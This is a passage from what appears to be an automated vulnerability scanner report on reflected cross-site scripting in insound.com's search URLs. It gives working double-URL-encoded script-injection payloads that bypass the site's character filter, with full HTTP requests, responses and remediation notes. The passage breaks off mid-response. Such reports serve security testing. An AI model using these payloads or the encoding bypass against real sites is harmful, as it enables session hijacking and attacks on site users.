Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:59 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=240695343; expires=Sun, 09-Jan-2011 02:38:59 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=452170903; expires=Sun, 09-Jan-2011 02:38:59 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Camu Tao2a5b5</title><script>alert(1)</script>2927d88952d</title>
...[SNIP]...

1.37. http://www.insound.com/search/query/Can&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Can&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 65603%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50650aabab5 was submitted in the REST URL parameter 3. This input was echoed as 65603</title><script>alert(1)</script>50650aabab5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Can65603%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e50650aabab5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vmh6746njq1me99iu3te4fr6p1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=79145739; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=228249256; expires=Sun, 09-Jan-2011 02:39:13 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Can65603</title><script>alert(1)</script>50650aabab5</title>
...[SNIP]...

1.38. http://www.insound.com/search/query/Can&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Can&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea5c0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef119ed9a7d2 was submitted in the REST URL parameter 3. This input was echoed as ea5c0"><script>alert(1)</script>f119ed9a7d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Canea5c0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef119ed9a7d2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=t7609m2h4b1k0182tmt82gjch6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=236130198; expires=Sun, 09-Jan-2011 02:39:07 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=127330716; expires=Sun, 09-Jan-2011 02:39:07 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Canea5c0"><script>alert(1)</script>f119ed9a7d2" />
...[SNIP]...

1.39. http://www.insound.com/search/query/Canada&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canada&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload bc8f0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e480ac429de0 was submitted in the REST URL parameter 3. This input was echoed as bc8f0</title><script>alert(1)</script>480ac429de0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Canadabc8f0%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e480ac429de0&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=se0s73ibgvtoijplq86lusfnd6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=272316181; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=290681254; expires=Sun, 09-Jan-2011 02:39:05 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Canadabc8f0</title><script>alert(1)</script>480ac429de0</title>
...[SNIP]...

1.40. http://www.insound.com/search/query/Canada&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Canada&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f39f2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1796f582d98 was submitted in the REST URL parameter 3. This input was echoed as f39f2"><script>alert(1)</script>1796f582d98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Canadaf39f2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1796f582d98&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=b1cjdqp1f9f08siseh0gk9s2n1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=209606677; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=397519922; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Canadaf39f2"><script>alert(1)</script>1796f582d98" />
...[SNIP]...

1.41. http://www.insound.com/search/query/Candace%20Pederson&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candace%20Pederson&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 321b4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e355ae165837 was submitted in the REST URL parameter 3. This input was echoed as 321b4</title><script>alert(1)</script>355ae165837 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candace%20Pederson321b4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e355ae165837&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=pvh0rpgqvpsvci5pigsk9rrdo4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=139125292; expires=Sun, 09-Jan-2011 02:39:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=46557056; expires=Sun, 09-Jan-2011 02:39:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candace Pederson321b4</title><script>alert(1)</script>355ae165837</title>
...[SNIP]...

1.42. http://www.insound.com/search/query/Candace%20Pederson&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candace%20Pederson&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54cbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ac25f5a8ae was submitted in the REST URL parameter 3. This input was echoed as 54cbd"><script>alert(1)</script>4ac25f5a8ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candace%20Pederson54cbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4ac25f5a8ae&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1pmdiqolr6lv3j76kq2chdo2j1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=156228455; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=490159533; expires=Sun, 09-Jan-2011 02:38:57 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19020

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candace Pederson54cbd"><script>alert(1)</script>4ac25f5a8ae" />
...[SNIP]...

1.43. http://www.insound.com/search/query/Candi%20Staton&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candi%20Staton&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d3a39%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e53c4a837866 was submitted in the REST URL parameter 3. This input was echoed as d3a39</title><script>alert(1)</script>53c4a837866 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candi%20Statond3a39%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e53c4a837866&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=97h0ful2soj74sn6lk9vectt37; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:19 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=143714990; expires=Sun, 09-Jan-2011 02:39:19 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=152065294; expires=Sun, 09-Jan-2011 02:39:19 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candi Statond3a39</title><script>alert(1)</script>53c4a837866</title>
...[SNIP]...

1.44. http://www.insound.com/search/query/Candi%20Staton&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candi%20Staton&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29567%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19070c0b8ec was submitted in the REST URL parameter 3. This input was echoed as 29567"><script>alert(1)</script>19070c0b8ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candi%20Staton29567%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19070c0b8ec&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ic6g2ebsfgriu5vlsh8n0cl7o1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=309731527; expires=Sun, 09-Jan-2011 02:39:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=93914654; expires=Sun, 09-Jan-2011 02:39:11 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candi Staton29567"><script>alert(1)</script>19070c0b8ec" />
...[SNIP]...

1.45. http://www.insound.com/search/query/Candie%20Hank&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candie%20Hank&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4cfb7%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd5d95a1ca4 was submitted in the REST URL parameter 3. This input was echoed as 4cfb7</title><script>alert(1)</script>bd5d95a1ca4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candie%20Hank4cfb7%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd5d95a1ca4&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=crfnjce70t07f7pvepefkf1pi5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=232920607; expires=Sun, 09-Jan-2011 02:39:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=290049157; expires=Sun, 09-Jan-2011 02:39:10 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candie Hank4cfb7</title><script>alert(1)</script>bd5d95a1ca4</title>
...[SNIP]...

1.46. http://www.insound.com/search/query/Candie%20Hank&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candie%20Hank&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96840%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec0727089e40 was submitted in the REST URL parameter 3. This input was echoed as 96840"><script>alert(1)</script>c0727089e40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candie%20Hank96840%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec0727089e40&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=qchke8bcrmn2rrg225tlrf9u91; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:04 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=298989875; expires=Sun, 09-Jan-2011 02:39:04 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=297735959; expires=Sun, 09-Jan-2011 02:39:04 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Candie Hank96840"><script>alert(1)</script>c0727089e40" />
...[SNIP]...

1.47. http://www.insound.com/search/query/Candlebox%20&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candlebox%20&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b7dab%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41e17648200 was submitted in the REST URL parameter 3. This input was echoed as b7dab</title><script>alert(1)</script>41e17648200 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candlebox%20b7dab%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e41e17648200&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=3hidkj0fmhjokevrot771e53q2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:39:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=451964201; expires=Sun, 09-Jan-2011 02:39:10 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=433461517; expires=Sun, 09-Jan-2011 02:39:10 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Candlebox b7dab</title><script>alert(1)</script>41e17648200</title>
...[SNIP]...

1.48. http://www.insound.com/search/query/Candlebox%20&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Candlebox%20&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2433b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc8ce133cab was submitted in the REST URL parameter 3. This input was echoed as 2433b"><script>alert(1)</script>bc8ce133cab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Candlebox%202433b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebc8ce133cab&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:39:05 GMT
Server: Apache/2.2.3 (Red Hat)
